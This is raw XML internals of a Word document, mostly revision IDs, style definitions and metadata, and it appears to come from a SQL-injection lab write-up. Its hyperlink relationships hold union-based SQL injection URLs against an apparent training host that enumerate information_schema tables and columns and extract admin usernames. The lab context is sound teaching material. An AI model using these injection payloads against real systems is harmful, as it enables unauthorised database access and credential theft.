    <w:rsid w:val="00455D87"/>
    <w:rsid w:val="00462E6F"/>
    <w:rsid w:val="004942C0"/>
    <w:rsid w:val="004D482E"/>
    <w:rsid w:val="0053629E"/>
    <w:rsid w:val="005402A6"/>
    <w:rsid w:val="00541E85"/>
    <w:rsid w:val="00542D7A"/>
    <w:rsid w:val="005459CB"/>
    <w:rsid w:val="00564F3D"/>
    <w:rsid w:val="0057041B"/>
    <w:rsid w:val="00601178"/>
    <w:rsid w:val="006043CF"/>
    <w:rsid w:val="006328C8"/>
    <w:rsid w:val="00654CE7"/>
    <w:rsid w:val="006673FD"/>
    <w:rsid w:val="0069784F"/>
    <w:rsid w:val="006D67B2"/>
    <w:rsid w:val="007B4B83"/>
    <w:rsid w:val="007F0509"/>
    <w:rsid w:val="00807833"/>
    <w:rsid w:val="00833D1A"/>
    <w:rsid w:val="0086463E"/>
    <w:rsid w:val="0088345A"/>
    <w:rsid w:val="008A0A22"/>
    <w:rsid w:val="008A3086"/>
    <w:rsid w:val="008B0727"/>
    <w:rsid w:val="008B2F90"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="008D0788"/>
    <w:rsid w:val="008E5772"/>
    <w:rsid w:val="009160D2"/>
    <w:rsid w:val="00945FEC"/>
    <w:rsid w:val="00953A0E"/>
    <w:rsid w:val="00960C5D"/>
    <w:rsid w:val="00961E1A"/>
    <w:rsid w:val="00973DC7"/>
    <w:rsid w:val="00991F54"/>
    <w:rsid w:val="00994057"/>
    <w:rsid w:val="009A4425"/>
    <w:rsid w:val="009C526C"/>
    <w:rsid w:val="00A2325E"/>
    <w:rsid w:val="00A30581"/>
    <w:rsid w:val="00A356BA"/>
    <w:rsid w:val="00A37B76"/>
    <w:rsid w:val="00A44835"/>
    <w:rsid w:val="00AB0961"/>
    <w:rsid w:val="00AC7FE7"/>
    <w:rsid w:val="00AD416F"/>
    <w:rsid w:val="00AF45CC"/>
    <w:rsid w:val="00B124AB"/>
    <w:rsid w:val="00B44B11"/>
    <w:rsid w:val="00B72742"/>
    <w:rsid w:val="00BC4791"/>
    <w:rsid w:val="00C47A2E"/>
    <w:rsid w:val="00C721B7"/>
    <w:rsid w:val="00CC4783"/>
    <w:rsid w:val="00D0426E"/>
    <w:rsid w:val="00D27216"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00D61110"/>
    <w:rsid w:val="00DE2B08"/>
    <w:rsid w:val="00DE6963"/>
    <w:rsid w:val="00DF2E70"/>
    <w:rsid w:val="00E123C5"/>
    <w:rsid w:val="00E40668"/>
    <w:rsid w:val="00E63E50"/>
    <w:rsid w:val="00E66E21"/>
    <w:rsid w:val="00E704EF"/>
    <w:rsid w:val="00E70AF7"/>
    <w:rsid w:val="00E73574"/>
    <w:rsid w:val="00E96A77"/>
    <w:rsid w:val="00EC3668"/>
    <w:rsid w:val="00F17314"/>
    <w:rsid w:val="00F50891"/>
    <w:rsid w:val="00F523DD"/>
    <w:rsid w:val="00F6708E"/>
    <w:rsid w:val="00F67960"/>
    <w:rsid w:val="00FC46D1"/>
    <w:rsid w:val="026F28DD"/>
    <w:rsid w:val="03ED2FD2"/>
    <w:rsid w:val="04956ECC"/>
    <w:rsid w:val="04DE007E"/>
    <w:rsid w:val="05856AD5"/>
    <w:rsid w:val="089748EE"/>
    <w:rsid w:val="09135CD7"/>
    <w:rsid w:val="0BFC773A"/>
    <w:rsid w:val="0C433405"/>
    <w:rsid w:val="10694104"/>
    <w:rsid w:val="15C57457"/>
    <w:rsid w:val="15F91251"/>
    <w:rsid w:val="16DC674F"/>
    <w:rsid w:val="1A6A1A99"/>
    <w:rsid w:val="20943C19"/>
    <w:rsid w:val="227B4506"/>
    <w:rsid w:val="22EA3156"/>
    <w:rsid w:val="238C6E29"/>
    <w:rsid w:val="23D9610A"/>
    <w:rsid w:val="25BB633A"/>
    <w:rsid w:val="263F0183"/>
    <w:rsid w:val="26C8461C"/>
    <w:rsid w:val="2B4D1741"/>
    <w:rsid w:val="2C245E51"/>
    <w:rsid w:val="2EAA702B"/>
    <w:rsid w:val="307B5D50"/>
    <w:rsid w:val="32512DA1"/>
    <w:rsid w:val="33003C1F"/>
    <w:rsid w:val="334B4FFB"/>
    <w:rsid w:val="3526087B"/>
    <w:rsid w:val="36FE7D7A"/>
    <w:rsid w:val="37E34E12"/>
    <w:rsid w:val="39D30E8D"/>
    <w:rsid w:val="3B9F55D8"/>
    <w:rsid w:val="3CCA65A0"/>
    <w:rsid w:val="3D5774D0"/>
    <w:rsid w:val="422F119E"/>
    <w:rsid w:val="42BC7CA1"/>
    <w:rsid w:val="451F439F"/>
    <w:rsid w:val="467D172B"/>
    <w:rsid w:val="46DA3884"/>
    <w:rsid w:val="475E2707"/>
    <w:rsid w:val="483C1068"/>
    <w:rsid w:val="48D97C39"/>
    <w:rsid w:val="4A6E49A3"/>
    <w:rsid w:val="4C6E5295"/>
    <w:rsid w:val="4D5B7E57"/>
    <w:rsid w:val="4E4D5283"/>
    <w:rsid w:val="4EFC61EA"/>
    <w:rsid w:val="54972DB4"/>
    <w:rsid w:val="583D6767"/>
    <w:rsid w:val="58B5414A"/>
    <w:rsid w:val="59870459"/>
    <w:rsid w:val="59DD379F"/>
    <w:rsid w:val="5BBC1B70"/>
    <w:rsid w:val="5D6456B9"/>
    <w:rsid w:val="5DC7295C"/>
    <w:rsid w:val="5EF57055"/>
    <w:rsid w:val="62E96ED1"/>
    <w:rsid w:val="64782567"/>
    <w:rsid w:val="66661AB5"/>
    <w:rsid w:val="685E5C6B"/>
    <w:rsid w:val="6EBA2350"/>
    <w:rsid w:val="6F0926A9"/>
    <w:rsid w:val="704B7174"/>
    <w:rsid w:val="709E1CFB"/>
    <w:rsid w:val="71C16BA1"/>
    <w:rsid w:val="735F2D53"/>
    <w:rsid w:val="751C1388"/>
    <w:rsid w:val="758F1B5A"/>
    <w:rsid w:val="7A147D16"/>
    <w:rsid w:val="7C1D1542"/>
    <w:rsid w:val="7C4466BB"/>
    <w:rsid w:val="7D6863C4"/>
    <w:rsid w:val="7EA1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B608F"/>
  <w15:docId w15:val="{534B7E82-D8A6-4172-AE48-73E2B05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88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8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Autospacing="1" w:after="0" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/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Autospacing="1" w:after="0" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman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  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000D1DA0"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0053629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629E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7B4B83"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="ac">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="008D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6978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6D67B2"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="5-5">
    <w:name w:val="Grid Table 5 Dark Accent 5"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="00F523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3-1">
    <w:name w:val="List Table 3 Accent 1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="48"/>
    <w:rsid w:val="00F523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b.pro/db/6290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u2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+select+1,table_name+from+information_schema.tables+where+table_schema=%27maoshe%27+limit+0,+1#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pu2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+SELECT+1,username+from+admin+limit+0,+1#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pu2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+select+1,2+limit+0,+1%23" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pu2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+SELECT+1,column_name+from+information_schema.columns+where+table_schema=%27maoshe%27+and+table_name=%27admin%27+limit+0,+1#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cnblogs.com/hirak0/p/15539022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A5AE-D3F1-455A-8203-DF93BAD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53</dc:creator>
  <cp:lastModifiedBy>陈 鹏宇</cp:lastModifiedBy>
  <cp:revision>75</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-09-11T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-1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617E66267E4BA8BFDC2D739B6E7B65_12</vt:lpwstr>
  </property>
</Properties>
</file>